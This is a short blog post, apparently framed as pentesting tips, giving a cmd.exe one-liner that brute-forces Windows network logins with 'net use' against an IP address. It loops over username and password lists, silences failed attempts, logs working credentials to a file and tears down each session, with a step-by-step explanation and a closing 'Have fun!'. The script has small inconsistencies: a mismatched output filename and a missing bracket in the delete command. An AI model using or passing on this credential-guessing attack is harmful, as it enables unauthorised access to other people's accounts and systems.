Weaponizing cmd.exe – UN/PW Guessing

This is a fantastic way to automate a dictionary attack on windows net accounts. This is part of my salute to Pentesting Ninjitsu.

See the full version on the new blog!

UN/PW Guessing

for /f %i in (knownUsers.txt) do @(for /f %j in (passwordList.txt) do @echo %i:%j & @net use \\<ip> %j /u:%i 2> nul && echo %i:%j >> success.txt && net use \\<ip /del)
how it works
This looks messy, but this is how it works:
  • Create a for look that iterates over items (note, not a /L) in users.txt list of users
for /f %i in (knownUsers.txt)
  • for each user in the list, do another for loop that iterates through a list of passwords in pass.txt
do @(for /f %j in (passwordList.txt)
  • print out the username:password combonation being tested
do @echo %i:%j
  • for each of those passwords, try to establish a session using the currently selected password, for the currently selected user
& @net use \\<ip> %j /u:%i
  • All errors (failed logins) are discarded
2> nul
  • If and ONLY if the command succeeds, append the username:password combo to successfulLogins.txt
&& echo %i:%j >> successfulLogins.txt
  • Again, if that login was succesful, we now need to destroy that session to be able to keep testing
&& net use \\<ip /del)

This is a fantastic tool. Have fun!


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: